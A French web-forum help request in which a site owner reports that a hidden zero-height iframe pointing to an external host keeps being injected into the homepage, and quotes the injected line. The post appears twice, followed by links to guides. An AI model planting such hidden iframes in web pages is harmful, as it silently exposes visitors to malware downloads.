Insertion de lien "vérolé' dans mon code
Roupie
-
Roupie -
Roupie -
Bonjour a tutti !
Je vous explique mon souci en deux mots :
J'ai un site perso de quelques pages
A la racine un index.htm
Et très fréquemment, lorsque je me connecte sur mon site, j'ai une alerte de mon antivirus préféré, qui m'informe que la page essaye d'en ouvrir une autre avec un virus ...
Alors, j'ouvre mon site avec un éditeur, et effectivement, je retrouve dans mon code une ligne :
<iframe src='http://ontilop.net/forum/index.php' height='0' width='1' frameborder='0'>
</iframe>
Je change mon mot de passe, je nettoie, je renvoie la page, et bingo ! deux jours plus tard ... ça recommence !
Je ne sais plus quoi faire, je change de mot de passe, j'ai changé d'hébergeur, et ça continue ... encore et encore ... et c'est que le début .. d'accord, d'accor ... quelque chose vient de tomber ... AAAh voila ... je pètes les plombs ....
Nan sans déconner, je sais plus quoi faire ...
Aidez moi les mecs (et les filles)
Merci d'avance ...
Je suis désolé de ce que je vais faire maintenant, mais j'ai besoin de savoir ce que ressentes ceux qui font ça :
slt lé meks, g 1 problm 2 virus, aidé moa, je c pu koi fèr !
Futain ... je deviens vraiment fou .... :'(
Je vous explique mon souci en deux mots :
J'ai un site perso de quelques pages
A la racine un index.htm
Et très fréquemment, lorsque je me connecte sur mon site, j'ai une alerte de mon antivirus préféré, qui m'informe que la page essaye d'en ouvrir une autre avec un virus ...
Alors, j'ouvre mon site avec un éditeur, et effectivement, je retrouve dans mon code une ligne :
<iframe src='http://ontilop.net/forum/index.php' height='0' width='1' frameborder='0'>
</iframe>
Je change mon mot de passe, je nettoie, je renvoie la page, et bingo ! deux jours plus tard ... ça recommence !
Je ne sais plus quoi faire, je change de mot de passe, j'ai changé d'hébergeur, et ça continue ... encore et encore ... et c'est que le début .. d'accord, d'accor ... quelque chose vient de tomber ... AAAh voila ... je pètes les plombs ....
Nan sans déconner, je sais plus quoi faire ...
Aidez moi les mecs (et les filles)
Merci d'avance ...
Je suis désolé de ce que je vais faire maintenant, mais j'ai besoin de savoir ce que ressentes ceux qui font ça :
slt lé meks, g 1 problm 2 virus, aidé moa, je c pu koi fèr !
Futain ... je deviens vraiment fou .... :'(
A voir également:
- Insertion de lien "vérolé' dans mon code
- Code ascii - Guide
- Lien url - Guide
- Créer un lien pour partager des photos - Guide
- Verificateur de lien - Guide
- Code puk bloqué - Guide